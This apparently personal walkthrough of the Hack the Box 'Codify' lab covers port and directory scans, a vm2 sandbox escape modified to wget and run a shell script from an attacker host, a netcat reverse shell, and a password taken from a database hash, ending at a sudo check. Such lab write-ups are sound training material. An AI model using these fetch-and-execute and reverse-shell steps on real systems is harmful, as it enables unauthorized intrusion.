Codify Lab

Hack the Box Penetration Lab

Reconnaissance

First up, a port scan:

┌──(zero㉿kali)-[~]
└─$ rustscan -a 10.10.11.239                
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/zero/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.239:22
Open 10.10.11.239:80
Open 10.10.11.239:3000
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-25 06:53 PST
Initiating Ping Scan at 06:53
Scanning 10.10.11.239 [2 ports]
Completed Ping Scan at 06:53, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:53
Completed Parallel DNS resolution of 1 host. at 06:53, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 06:53
Scanning 10.10.11.239 [3 ports]
Discovered open port 80/tcp on 10.10.11.239
Discovered open port 22/tcp on 10.10.11.239
Discovered open port 3000/tcp on 10.10.11.239
Completed Connect Scan at 06:53, 0.08s elapsed (3 total ports)
Nmap scan report for 10.10.11.239
Host is up, received syn-ack (0.054s latency).
Scanned at 2024-02-25 06:53:39 PST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
3000/tcp open  ppp     syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

A quick rustscan revelaed 3 open ports. 22 which is an SSH, 80 which is a http and 3000 which appears to host “Node.js Express framework”.

A website URL was also revealed after a quick nmap scan: codify.htb, which appears to be a place to check Node.js code. Which allows you to enter your own code into an editor and see the output. It says it exectues it in a sandbox environment, but this could potentially be used for manipulation.

Press enter or click to view image in full size

I then performed a Fuzzscan:

┌──(zero㉿kali)-[~]
└─$ feroxbuster -u http://codify.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -k      

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://codify.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔓  Insecure              │ true
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       10l       15w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       61l      199w     2665c http://codify.htb/limitations
200      GET      119l      246w     3123c http://codify.htb/editor
200      GET       50l      282w     2921c http://codify.htb/about
200      GET       38l      239w     2269c http://codify.htb/
200      GET      119l      246w     3123c http://codify.htb/Editor
200      GET       50l      282w     2921c http://codify.htb/About
403      GET        9l       28w      275c http://codify.htb/server-status
200      GET       50l      282w     2921c http://codify.htb/ABOUT
[####################] - 70s    30006/30006   0s      found:8       errors:5      
[####################] - 70s    30000/30000   430/s   http://codify.htb/

There didn’t seem to be any hidden URLs on this scan. So I went hunt a little to try and get some extra information. The website did list some restrictions when using the tool, limiting some modules in JS as well as some modules that are whitelisted.

Press enter or click to view image in full size

I then went ahead an peformed another scan, this time for subdomains. The scan revealed nothing.

The next thing I wanted to try was to test out the Editor. I loaded up BurpSuite and set everything up to capture what happens when you hit the run button. Nothing crazy seemed to happen.

After looking around the site some more I found that the editor uses the vm2 library for sandboxing JS. This was the spring board I needed.

Press enter or click to view image in full size

After a little bit of searching, I found that this particular version has an exploit for breaking out of the sandbox and spawning a shell.

https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd

Press enter or click to view image in full size

Now to modify the code and try and execute it inside the editor. I got a little confused at to what part of the code to edit. But after some research, we need to modify execSync and pass through some code of our own.

Lets just upload a bash file via this code then execute it.

I used this code to upload the file:

wget http://[IP]/shell.sh

And this code to make sure I could execute it and then execute the shell:

chmod +x shell.sh

./shell.sh

Admittidly I made quite a stupid mistake at this point. I had exectued the file about 4 times and wondered why I wasn’t getting access to the system. Only to realise that I set up a hosting server on one of my ports. Not an nc listener to listen for the shell to execute…so anyway, after that 10 minute mistake I got in.

┌──(zero㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [] from (UNKNOWN) [10.10.11.239] 52482
bash: cannot set terminal process group (1250): Inappropriate ioctl for device
bash: no job control in this shell
svc@codify:~$

Here are my shells I kept modifying to try and sort the issue LMAO:

Doing my ususal quick search for whoami id and checking the different users I found a user called joshua who had the same permissions as root.

Slightly stumped I just poked around the system a little and noticed that inside /var/www/contact there was a file called tickets.db, this would be an interesting database to look into. After using cat on the file I found some sort of hash next to joshua.

Press enter or click to view image in full size

There we have it! Looks like the password to joshua is spongebob1. Lets login and see what we can find!

Found the user flag! Now its time to try and get root access!

The first thing I checked was what things that joshua to run as sudo. It turns out there is 1 script that could be ran, called mysql-backup.sh.

Press enter or click to view image in full size

PreviousHeadless LabNextCozyHosting Lab

Last updated